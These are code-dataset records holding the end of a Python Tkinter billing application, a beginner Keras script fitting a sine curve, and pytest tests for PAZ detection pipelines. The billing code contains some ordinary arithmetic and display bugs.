= Label(F2, text=\"Mask\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n mask_lbl.grid(row=1, column=0, padx=10, pady=10, sticky='W')\r\n mask_txt = Entry(F2, width=10, textvariable=self.mask, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n mask_txt.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n hand_gloves_lbl = Label(F2, text=\"Hand Gloves\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n hand_gloves_lbl.grid(row=2, column=0, padx=10, pady=10, sticky='W')\r\n hand_gloves_txt = Entry(F2, width=10, textvariable=self.hand_gloves, font=('times new roman', 16, 'bold'), bd=5, relief =GROOVE)\r\n hand_gloves_txt.grid(row=2, column=1, padx=10, pady=10)\r\n\r\n syrup_lbl = Label(F2, text=\"Syrup\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n syrup_lbl.grid(row=3, column=0, padx=10, pady=10, sticky='W')\r\n syrup_txt = Entry(F2, width=10, textvariable=self.syrup, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n syrup_txt.grid(row=3, column=1, padx=10, pady=10)\r\n\r\n cream_lbl = Label(F2, text=\"Cream\", font=('times new roman', 16, 'bold'), bg = \"#badc57\", fg = \"black\")\r\n cream_lbl.grid(row=4, column=0, padx=10, pady=10, sticky='W')\r\n cream_txt = Entry(F2, width=10, textvariable=self.cream, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n cream_txt.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n thermal_gun_lbl = Label(F2, text=\"Thermal Gun\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n thermal_gun_lbl.grid(row=5, column=0, padx=10, pady=10, sticky='W')\r\n thermal_gun_txt = Entry(F2, width=10, textvariable=self.thermal_gun, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n thermal_gun_txt.grid(row=5, column=1, padx=10, pady=10)\r\n\r\n # ==========GroceryItems=========================\r\n F3 = LabelFrame(self.root, text=\"Grocery Items\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F3.place(x=340, y=180, width=325, height=380)\r\n\r\n rice_lbl = Label(F3, text=\"Rice\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n rice_lbl.grid(row=0, column=0, padx=10, pady=10, sticky='W')\r\n rice_txt = Entry(F3, width=10, textvariable=self.rice, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n rice_txt.grid(row=0, column=1, padx=10, pady=10)\r\n\r\n food_oil_lbl = Label(F3, text=\"Food Oil\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n food_oil_lbl.grid(row=1, column=0, padx=10, pady=10, sticky='W')\r\n food_oil_txt = Entry(F3, width=10, textvariable=self.food_oil, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n food_oil_txt.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n wheat_lbl = Label(F3, text=\"Wheat\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n wheat_lbl.grid(row=2, column=0, padx=10, pady=10, sticky='W')\r\n wheat_txt = Entry(F3, width=10, textvariable=self.wheat, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n wheat_txt.grid(row=2, column=1, padx=10, pady=10)\r\n\r\n spices_lbl = Label(F3, text=\"Spices\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n spices_lbl.grid(row=3, column=0, padx=10, pady=10, sticky='W')\r\n spices_txt = Entry(F3, width=10, textvariable=self.spices, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n spices_txt.grid(row=3, column=1, padx=10, pady=10)\r\n\r\n flour_lbl = Label(F3, text=\"Flour\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n flour_lbl.grid(row=4, column=0, padx=10, pady=10, sticky='W')\r\n flour_txt = Entry(F3, width=10, textvariable=self.flour, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n flour_txt.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n maggi_lbl = Label(F3, text=\"Maggi\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n maggi_lbl.grid(row=5, column=0, padx=10, pady=10, sticky='W')\r\n maggi_txt = Entry(F3, width=10, textvariable=self.maggi, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n maggi_txt.grid(row=5, column=1, padx=10, pady=10)\r\n\r\n # ===========ColdDrinks================================\r\n F4 = LabelFrame(self.root, text=\"Cold Drinks\", font=('times new roman', 15, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F4.place(x=670, y=180, width=325, height=380)\r\n\r\n sprite_lbl = Label(F4, text=\"Sprite\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n sprite_lbl.grid(row=0, column=0, padx=10, pady=10, sticky='W')\r\n sprite_txt = Entry(F4, width=10, textvariable=self.sprite, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n sprite_txt.grid(row=0, column=1, padx=10, pady=10)\r\n\r\n mineral_lbl = Label(F4, text=\"Mineral Water\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n mineral_lbl.grid(row=1, column=0, padx=10, pady=10, sticky='W')\r\n mineral_txt = Entry(F4, width=10, textvariable=self.mineral, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n mineral_txt.grid(row=1, column=1, padx=10, pady=10)\r\n\r\n juice_lbl = Label(F4, text=\"Juice\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n juice_lbl.grid(row=2, column=0, padx=10, pady=10, sticky='W')\r\n juice_txt = Entry(F4, width=10, textvariable=self.juice, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n juice_txt.grid(row=2, column=1, padx=10, pady=10)\r\n\r\n coke_lbl = Label(F4, text=\"Coke\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n coke_lbl.grid(row=3, column=0, padx=10, pady=10, sticky='W')\r\n coke_txt = Entry(F4, width=10, textvariable=self.coke, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n coke_txt.grid(row=3, column=1, padx=10, pady=10)\r\n\r\n lassi_lbl = Label(F4, text=\"Lassi\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n lassi_lbl.grid(row=4, column=0, padx=10, pady=10, sticky='W')\r\n lassi_txt = Entry(F4, width=10, textvariable=self.lassi, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n lassi_txt.grid(row=4, column=1, padx=10, pady=10)\r\n\r\n mountain_duo_lbl = Label(F4, text=\"Mountain Duo\", font=('times new roman', 16, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n mountain_duo_lbl.grid(row=5, column=0, padx=10, pady=10, sticky='W')\r\n mountain_duo_txt = Entry(F4, width=10, textvariable=self.mountain_duo, font=('times new roman', 16, 'bold'), bd=5, relief=GROOVE)\r\n mountain_duo_txt.grid(row=5, column=1, padx=10, pady=10)\r\n\r\n # =================BillArea======================\r\n F5 = Frame(self.root, bd=10, relief=GROOVE)\r\n F5.place(x=1010, y=180, width=350, height=380)\r\n\r\n bill_title = Label(F5, text=\"Bill Area\", font='arial 15 bold', bd=7, relief=GROOVE)\r\n bill_title.pack(fill=X)\r\n scroll_y = Scrollbar(F5, orient=VERTICAL)\r\n self.txtarea = Text(F5, yscrollcommand=scroll_y.set)\r\n scroll_y.pack(side=RIGHT, fill=Y)\r\n scroll_y.config(command=self.txtarea.yview)\r\n self.txtarea.pack(fill=BOTH, expand=1)\r\n\r\n # =======================ButtonFrame=============\r\n F6 = LabelFrame(self.root, text=\"Bill Area\", font=('times new roman', 14, 'bold'), bd=10, fg=\"Black\", bg=\"#badc57\")\r\n F6.place(x=0, y=560, relwidth=1, height=140)\r\n\r\n m1_lbl = Label(F6, text=\"Total Medical Price\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m1_lbl.grid(row=0, column=0, padx=20, pady=1, sticky='W')\r\n m1_txt = Entry(F6, width=18, textvariable=self.medical_price, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m1_txt.grid(row=0, column=1, padx=18, pady=1)\r\n\r\n m2_lbl = Label(F6, text=\"Total Grocery Price\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m2_lbl.grid(row=1, column=0, padx=20, pady=1, sticky='W')\r\n m2_txt = Entry(F6, width=18, textvariable=self.grocery_price, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m2_txt.grid(row=1, column=1, padx=18, pady=1)\r\n\r\n m3_lbl = Label(F6, text=\"Total Cold Drinks Price\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m3_lbl.grid(row=2, column=0, padx=20, pady=1, sticky='W')\r\n m3_txt = Entry(F6, width=18, textvariable=self.cold_drinks_price, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m3_txt.grid(row=2, column=1, padx=18, pady=1)\r\n\r\n m4_lbl = Label(F6, text=\"Medical Tax\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m4_lbl.grid(row=0, column=2, padx=20, pady=1, sticky='W')\r\n m4_txt = Entry(F6, width=18, textvariable=self.medical_tax, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m4_txt.grid(row=0, column=3, padx=18, pady=1)\r\n\r\n m5_lbl = Label(F6, text=\"Grocery Tax\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m5_lbl.grid(row=1, column=2, padx=20, pady=1, sticky='W')\r\n m5_txt = Entry(F6, width=18, textvariable=self.grocery_tax, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m5_txt.grid(row=1, column=3, padx=18, pady=1)\r\n\r\n m6_lbl = Label(F6, text=\"Cold Drinks Tax\", font=('times new roman', 14, 'bold'), bg=\"#badc57\", fg=\"black\")\r\n m6_lbl.grid(row=2, column=2, padx=20, pady=1, sticky='W')\r\n m6_txt = Entry(F6, width=18, textvariable=self.cold_drinks_tax, font='arial 10 bold', bd=7, relief=GROOVE)\r\n m6_txt.grid(row=2, column=3, padx=18, pady=1)\r\n\r\n # =============Buttons-======================================\r\n btn_f = Frame(F6, bd=7, relief=GROOVE)\r\n btn_f.place(x=760, width=580, height=105)\r\n\r\n total_btn = Button(btn_f, command=self.total, text=\"Total\", bg=\"#535C68\", bd=2, fg=\"white\", pady=15, width=12, font='arial 13 bold')\r\n total_btn.grid(row=0, column=0, padx=5, pady=5)\r\n\r\n generateBill_btn = Button(btn_f, command=self.bill_area, text=\"Generate Bill\", bd=2, bg=\"#535C68\", fg=\"white\", pady=12, width=12, font='arial 13 bold')\r\n generateBill_btn.grid(row=0, column=1, padx=5, pady=5)\r\n\r\n clear_btn = Button(btn_f, command=self.clear_data, text=\"Clear\", bg=\"#535C68\", bd=2, fg=\"white\", pady=15, width=12, font='arial 13 bold')\r\n clear_btn.grid(row=0, column=2, padx=5, pady=5)\r\n\r\n exit_btn = Button(btn_f, command=self.exit_app, text=\"Exit\", bd=2, bg=\"#535C68\", fg=\"white\", pady=15, width=12, font='arial 13 bold')\r\n exit_btn.grid(row=0, column=3, padx=5, pady=5)\r\n self.welcome_bill()\r\n \r\n # ==================totalBill============================\r\n def total(self):\r\n self.m_h_g_p = self.hand_gloves.get()*12\r\n self.m_s_p = self.sanitizer.get()*2\r\n self.m_m_p = self.mask.get()*5\r\n self.m_s_p = self.syrup.get()*30\r\n self.m_c_p = self.cream.get()*5\r\n self.m_t_g_p = self.thermal_gun.get()*15\r\n self.total_medical_price = float(self.m_m_p+self.m_h_g_p+self.m_s_p+self.m_c_p+self.m_t_g_p+self.m_s_p)\r\n\r\n self.medical_price.set(\"Rs. \"+str(self.total_medical_price))\r\n self.c_tax = round((self.total_medical_price*0.05), 2)\r\n self.medical_tax.set(\"Rs. \"+str(self.c_tax))\r\n\r\n self.g_r_p = self.rice.get()*10\r\n self.g_f_o_p = self.food_oil.get()*10\r\n self.g_w_p = self.wheat.get()*10\r\n self.g_s_p = self.spices.get()*6\r\n self.g_f_p = self.flour.get()*8\r\n self.g_m_p = self.maggi.get()*5\r\n self.total_grocery_price = float(self.g_r_p+self.g_f_o_p+self.g_w_p+self.g_s_p+self.g_f_p+self.g_m_p)\r\n\r\n self.grocery_price.set(\"Rs. \" + str(self.total_grocery_price))\r\n self.g_tax = round((self.total_grocery_price*5), 2)\r\n self.grocery_tax.set(\"Rs. \" + str(self.g_tax))\r\n\r\n self.c_d_s_p = self.sprite.get()*10\r\n self.c_d_w_p = self.mineral.get()*10\r\n self.c_d_j_p = self.juice.get()*10\r\n self.c_d_c_p = self.coke.get()*10\r\n self.c_d_l_p = self.lassi.get()*10\r\n self.c_m_d = self.mountain_duo.get()*10\r\n self.total_cold_drinks_price = float(self.c_d_s_p+self.c_d_w_p+self.c_d_j_p+self.c_d_c_p+self.c_d_l_p+self.c_m_d)\r\n\r\n self.cold_drinks_price.set(\"Rs. \"+str(self.total_cold_drinks_price))\r\n self.c_d_tax = round((self.total_cold_drinks_price * 0.1), 2)\r\n self.cold_drinks_tax.set(\"Rs. \"+str(self.c_d_tax))\r\n\r\n self.total_bill = float(self.total_medical_price+self.total_grocery_price+self.total_cold_drinks_price+self.c_tax+self.g_tax+self.c_d_tax)\r\n \r\n # ======================welcomeBill=============================== \r\n def welcome_bill(self):\r\n self.txtarea.delete('1.0', END)\r\n self.txtarea.insert(END, \"\\tWelcome Grocery Retail\")\r\n self.txtarea.insert(END, f\"\\nBill Number:{self.bill_no.get()}\")\r\n self.txtarea.insert(END, f\"\\nCustomer Name:{self.c_name.get()}\")\r\n self.txtarea.insert(END, f\"\\nPhone Number{self.c_phone.get()}\")\r\n self.txtarea.insert(END, f\"\\n================================\")\r\n self.txtarea.insert(END, f\"\\nProducts\\t\\tQTY\\t\\tPrice\")\r\n \r\n# =============================generatebill=================================\r\n def bill_area(self):\r\n if self.c_name.get() == \" \" or self.c_phone.get() == \" \":\r\n messagebox.showerror(\"Error\", \"Customer Details Are Must\")\r\n elif self.medical_price.get() == \"Rs. 0.0\" and self.grocery_price.get() == \"Rs. 0.0\" and self.cold_drinks_price.get()==\"Rs. 0.0\":\r\n messagebox.showerror(\"Error\", \"No Product Purchased\")\r\n else:\r\n self.welcome_bill()\r\n # ============medical===========================\r\n if self.sanitizer.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Sanitizer\\t\\t{self.sanitizer.get()}\\t\\t{self.m_s_p}\")\r\n if self.mask.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Mask\\t\\t{self.mask.get()}\\t\\t{self.m_m_p}\")\r\n if self.hand_gloves.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Hand Gloves\\t\\t{self.hand_gloves.get()}\\t\\t{self.m_h_g_p}\")\r\n if self.syrup.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Syrup\\t\\t{self.syrup.get()}\\t\\t{self.m_s_p}\")\r\n if self.cream.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Cream\\t\\t{self.cream.get()}\\t\\t{self.m_c_p}\")\r\n if self.thermal_gun.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Thermal Gun\\t\\t{self.sanitizer.get()}\\t\\t{self.m_t_g_p}\")\r\n # ==============Grocery============================\r\n if self.rice.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Rice\\t\\t{self.rice.get()}\\t\\t{self.g_r_p}\")\r\n if self.food_oil.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Food Oil\\t\\t{self.food_oil.get()}\\t\\t{self.g_f_o_p}\")\r\n if self.wheat.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Wheat\\t\\t{self.wheat.get()}\\t\\t{self.g_w_p}\")\r\n if self.spices.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Spices\\t\\t{self.spices.get()}\\t\\t{self.g_s_p}\")\r\n if self.flour.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Flour\\t\\t{self.flour.get()}\\t\\t{self.g_f_p}\")\r\n if self.maggi.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Maggi\\t\\t{self.maggi.get()}\\t\\t{self.g_m_p}\")\r\n #================ColdDrinks==========================\r\n if self.sprite.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Sprite\\t\\t{self.sprite.get()}\\t\\t{self.c_d_s_p}\")\r\n if self.mineral.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Mineral\\t\\t{self.mineral.get()}\\t\\t{self.c_d_w_p}\")\r\n if self.juice.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Juice\\t\\t{self.juice.get()}\\t\\t{self.c_d_j_p}\")\r\n if self.coke.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Coke\\t\\t{self.coke.get()}\\t\\t{self.c_d_c_p}\")\r\n if self.lassi.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Lassi\\t\\t{self.cream.get()}\\t\\t{self.c_d_l_p}\")\r\n if self.mountain_duo.get() != 0:\r\n self.txtarea.insert(END, f\"\\n Mountain Duo\\t\\t{self.sanitizer.get()}\\t\\t{self.c_m_d}\")\r\n self.txtarea.insert(END, f\"\\n--------------------------------\")\r\n # ===============taxes==============================\r\n if self.medical_tax.get() != '0.0':\r\n self.txtarea.insert(END, f\"\\n Medical Tax\\t\\t\\t{self.medical_tax.get()}\")\r\n if self.grocery_tax.get() != '0.0':\r\n self.txtarea.insert(END, f\"\\n Grocery Tax\\t\\t\\t{self.grocery_tax.get()}\")\r\n if self.cold_drinks_tax.get() != '0.0':\r\n self.txtarea.insert(END, f\"\\n Cold Drinks Tax\\t\\t\\t{self.cold_drinks_tax.get()}\")\r\n\r\n self.txtarea.insert(END, f\"\\n Total Bil:\\t\\t\\t Rs.{self.total_bill}\")\r\n self.txtarea.insert(END, f\"\\n--------------------------------\")\r\n self.save_bill()\r\n\r\n def save_bill(self):\r\n op = messagebox.askyesno(\"Save Bill\", \"Do you want to save the bill?\")\r\n if op > 0:\r\n self.bill_data = self.txtarea.get('1.0', END)\r\n f1 = open(\"bills/\"+str(self.bill_no.get())+\".txt\", \"w\")\r\n f1.write(self.bill_data)\r\n f1.close()\r\n messagebox.showinfo(\"Saved\", f\"Bill no:{self.bill_no.get()} Saved Successfully\")\r\n else:\r\n return\r\n \r\n #=======================findBill=============================\r\n def find_bill(self):\r\n present = \"no\"\r\n for i in os.listdir(\"bills/\"):\r\n if i.split('.')[0] == self.search_bill.get():\r\n f1 = open(f\"bills/{i}\", \"r\")\r\n self.txtarea.delete(\"1.0\", END)\r\n for d in f1:\r\n self.txtarea.insert(END, d)\r\n f1.close()\r\n present = \"yes\"\r\n if present == \"no\":\r\n messagebox.showerror(\"Error\", \"Invalid Bill No\")\r\n\r\n #===========================clearsection=====================\r\n def clear_data(self):\r\n op = messagebox.askyesno(\"Clear\", \"Do you really want to Clear?\")\r\n if op > 0:\r\n self.sanitizer.set(0)\r\n self.mask.set(0)\r\n self.hand_gloves.set(0)\r\n self.syrup.set(0)\r\n self.cream.set(0)\r\n self.thermal_gun.set(0)\r\n # ============grocery==============================\r\n self.rice.set(0)\r\n self.food_oil.set(0)\r\n self.wheat.set(0)\r\n self.spices.set(0)\r\n self.flour.set(0)\r\n self.maggi.set(0)\r\n # =============coldDrinks=============================\r\n self.sprite.set(0)\r\n self.mineral.set(0)\r\n self.juice.set(0)\r\n self.coke.set(0)\r\n self.lassi.set(0)\r\n self.mountain_duo.set(0)\r\n # =============taxes==========================================\r\n self.medical_price.set(\"\")\r\n self.grocery_price.set(\"\")\r\n self.cold_drinks_price.set(\"\")\r\n\r\n self.medical_tax.set(\"\")\r\n self.grocery_tax.set(\"\")\r\n self.cold_drinks_tax.set(\"\")\r\n\r\n self.c_name.set(\"\")\r\n self.c_phone.set(\"\")\r\n\r\n self.bill_no.set(\"\")\r\n x = random.randint(1000, 9999)\r\n self.bill_no.set(str(x))\r\n\r\n self.search_bill.set(\"\")\r\n self.welcome_bill()\r\n\r\n # ======================exitsection==============================\r\n def exit_app(self):\r\n op = messagebox.askyesno(\"Exit\", \"Do you really want to exit?\")\r\n if op > 0:\r\n self.root.destroy()\r\n\r\n\r\nroot = Tk()\r\nobj = Bill_App(root)\r\nroot.mainloop()\r\n\r\n#==== End of code=======================\r\n","sub_path":"GUIScripts/Billing System/billing_system.py","file_name":"billing_system.py","file_ext":"py","file_size_in_byte":23853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"431771266","text":"import tensorflow as tf \nfrom tensorflow.keras import layers\nimport numpy as np\nimport math\n\n# REMEMBER, size(data)==input_shape of first layer>batch_size\n\ndata = np.linspace(0.0,(math.pi)/2,num=32) #Input\nlabels = np.sin(data) #Output\n\nval_data = np.linspace(0.0,(math.pi)/2,num=10)\nval_labels = np.sin(val_data)\n\n\n#code which makes a sequential neural network, adds 3 layers of [64,64,10]\n\n# model = tf.keras.Sequential()\n\n# model.add(layers.Dense(64, activation='sigmoid'))#or u can use tf.sigmoid\n# model.add(layers.Dense(64, activation=tf.sigmoid))\n\n# layers.Dense(64, kernal_regularizer=tf.keras.regularizers.l1(0.01)) # A linear layer with L1 regularization of factor 0.01 applied to the kernel matrix\n\n# layers.Dense(64, bias_regularizer=tf.keras.regularizers.l2(0.01)) ## A linear layer with L2 regularization of factor 0.01 applied to the bias vector:\n\n# layers.Dense(64, kernel_initializer='orthogonal') #Initializes a kernal with Random Orthogonal Matrix\n\n# layers.Dense(64, bias_initializer=tf.keras.initializers.constant(2.0))# A linear layer with a bias vector initialized to 2.0s:\n\n# model.add(layers.Dense(10, activation='softmax'))\n\n\nmodel = tf.keras.Sequential([\n# Adds a densely-connected layer with 64 units to the model:\nlayers.Dense(64, activation='sigmoid', input_shape=(1,)),\n# Add another:\nlayers.Dense(64, activation='sigmoid'),\n# Add a softmax layer with 10 output units:\nlayers.Dense(1, activation='tanh')])\n\n# model.compile(optimizer=tf.train.AdamOptimizer(0.001),\n# \tloss='categorical_crossentropy',\n# \tmetrics=['accuracy'])\n\n# Configure a model for mean-squared error regression.\nmodel.compile(optimizer=tf.train.AdamOptimizer(0.01),\n\tloss='mse', # mean squared error\n\tmetrics=['mae']) # mean absolute error\n\n# Configure a model for categorical classification.\n# model.compile(optimizer=tf.train.RMSPropOptimizer(0.01), \n\t# loss=tf.keras.losses.categorical_crossentropy,\n\t# metrics=[tf.keras.metrics.categorical_accuracy])\n\ncallbacks = [\n # Interrupt training if `val_loss` stops improving for over 2 epochs\n tf.keras.callbacks.EarlyStopping(patience=2, monitor='val_loss'),\n # Write TensorBoard logs to `./logs` directory\n tf.keras.callbacks.TensorBoard(log_dir='./logs')\n]\n\nmodel.fit(data, labels, epochs=200, batch_size=1, validation_data=(val_data, val_labels)) \n\nmodel.evaluate(data, labels, batch_size=1)\n\nresult = model.predict(data, batch_size=32)\n\nprint(result.T) #[start:stop:step]\nprint((labels[:]))\n\na=np.array([1])\n\nprint(model.predict(a,batch_size=1)) #Predict output of Sin(1)\n\n# model.evaluate(dataset, steps=30)\n","sub_path":"1_BASIC/5_callbacks.py","file_name":"5_callbacks.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"411927017","text":"import pytest\nimport numpy as np\n\nimport os\nfrom tensorflow.keras.utils import get_file\nfrom paz.backend.image import load_image\n\nfrom paz.pipelines import SSD512COCO, SSD300VOC, SSD300FAT, SSD512YCBVideo\nfrom paz.pipelines import HaarCascadeFrontalFace\nfrom paz.pipelines import DetectFaceKeypointNet2D32\nfrom paz.pipelines import DetectMiniXceptionFER\nfrom paz.abstract.messages import Box2D\n\n\n@pytest.fixture\ndef image_with_everyday_objects():\n URL = ('https://github.com/oarriaga/altamira-data/releases/download'\n '/v0.9.1/image_with_everyday_classes.jpg')\n filename = os.path.basename(URL)\n fullpath = get_file(filename, URL, cache_subdir='paz/tests')\n image = load_image(fullpath)\n return image\n\n\n@pytest.fixture\ndef image_with_tools():\n URL = ('https://github.com/oarriaga/altamira-data/releases/download'\n '/v0.9.1/image_with_tools.jpg')\n filename = os.path.basename(URL)\n fullpath = get_file(filename, URL, cache_subdir='paz/tests')\n image = load_image(fullpath)\n return image\n\n\n@pytest.fixture\ndef image_with_faces():\n URL = ('https://github.com/oarriaga/altamira-data/releases/download'\n '/v0.9.1/image_with_faces.jpg')\n filename = os.path.basename(URL)\n fullpath = get_file(filename, URL, cache_subdir='paz/tests')\n image = load_image(fullpath)\n return image\n\n\n@pytest.fixture\ndef boxes_SSD512COCO():\n boxes2D = [\n Box2D(np.array([544, 373, 1018, 807]), 0.9982471, 'person'),\n Box2D(np.array([483, 710, 569, 819]), 0.78569597, 'cup'),\n Box2D(np.array([943, 182, 1083, 341]), 0.7874794, 'potted plant'),\n Box2D(np.array([150, 721, 1413, 993]), 0.6786173, 'dining table'),\n Box2D(np.array([577, 619, 895, 820]), 0.83648031, 'laptop')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_SSD300VOC():\n boxes2D = [\n Box2D(np.array([510, 383, 991, 806]), 0.99694544, 'person'),\n Box2D(np.array([954, 192, 1072, 350]), 0.7211749, 'pottedplant')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_SSD300FAT():\n boxes2D = [\n Box2D(np.array([110, 96, 150, 125]), 0.626648, '007_tuna_fish_can'),\n Box2D(np.array([41, 93, 146, 167]), 0.7510558, '035_power_drill'),\n Box2D(np.array([171, 22, 227, 131]), 0.793466, '006_mustard_bottle'),\n Box2D(np.array([99, 6, 151, 107]), 0.50704032, '003_cracker_box')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_SSD512YCBVideo():\n boxes2D = [\n Box2D(np.array([115, 121, 215, 155]), 0.9056605, '011_banana'),\n Box2D(np.array([38, 93, 162, 164]), 0.839406490, '035_power_drill'),\n Box2D(np.array([173, 25, 217, 123]), 0.99889081, '006_mustard_bottle'),\n Box2D(np.array([93, 11, 148, 104]), 0.825154304, '003_cracker_box')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_HaarCascadeFace():\n boxes2D = [\n Box2D(np.array([701, 362, 827, 488]), 1.0, 'Face'),\n Box2D(np.array([488, 408, 612, 532]), 1.0, 'Face'),\n Box2D(np.array([855, 466, 974, 585]), 1.0, 'Face')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_MiniXceptionFER():\n boxes2D = [\n Box2D(np.array([701, 362, 827, 488]), 0.49472683, 'neutral'),\n Box2D(np.array([488, 408, 612, 532]), 0.28161105, 'sad'),\n Box2D(np.array([855, 466, 974, 585]), 0.98590159, 'happy')]\n return boxes2D\n\n\n@pytest.fixture\ndef boxes_FaceKeypointNet2D32():\n boxes2D = [\n Box2D(np.array([701, 362, 827, 488]), 1.0, 'Face'),\n Box2D(np.array([488, 408, 612, 532]), 1.0, 'Face'),\n Box2D(np.array([855, 466, 974, 585]), 1.0, 'Face')]\n return boxes2D\n\n\ndef assert_inferences(detector, image, labelled_boxes):\n inferences = detector(image)\n predicted_boxes2D = inferences['boxes2D']\n assert len(predicted_boxes2D) == len(labelled_boxes)\n for box2D, predicted_box2D in zip(labelled_boxes, predicted_boxes2D):\n assert np.allclose(box2D.coordinates, predicted_box2D.coordinates)\n assert np.allclose(box2D.score, predicted_box2D.score)\n assert (box2D.class_name == predicted_box2D.class_name)\n\n\ndef test_SSD512COCO(image_with_everyday_objects, boxes_SSD512COCO):\n detector = SSD512COCO()\n assert_inferences(detector, image_with_everyday_objects, boxes_SSD512COCO)\n\n\ndef test_SSD300VOC(image_with_everyday_objects, boxes_SSD300VOC):\n detector = SSD300VOC()\n assert_inferences(detector, image_with_everyday_objects, boxes_SSD300VOC)\n\n\ndef test_SSD300FAT(image_with_tools, boxes_SSD300FAT):\n detector = SSD300FAT(0.5)\n assert_inferences(detector, image_with_tools, boxes_SSD300FAT)\n\n\ndef test_SSD512YCBVideo(image_with_tools, boxes_SSD512YCBVideo):\n detector = SSD512YCBVideo()\n assert_inferences(detector, image_with_tools, boxes_SSD512YCBVideo)\n\n\ndef test_HaarCascadeFrontalFace(image_with_faces, boxes_HaarCascadeFace):\n detector = HaarCascadeFrontalFace()\n assert_inferences(detector, image_with_faces, boxes_HaarCascadeFace)\n\n\ndef test_DetectMiniXceptionFER(image_with_faces, boxes_MiniXceptionFER):\n detector = DetectMiniXceptionFER()\n assert_inferences(detector, image_with_faces, boxes_MiniXceptionFER)\n\n\ndef test_boxes_DetectFaceKeypointNet2D32(image_with_faces,\n boxes_FaceKeypointNet2D32):\n detector = DetectFaceKeypointNet2D32()\n assert_inferences(detector, image_with_faces, boxes_FaceKeypointNet2D32)\n","sub_path":"tests/paz/pipelines/detection_test.py","file_name":"detection_test.py","file_ext":"py","file_size_in_byte":5349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
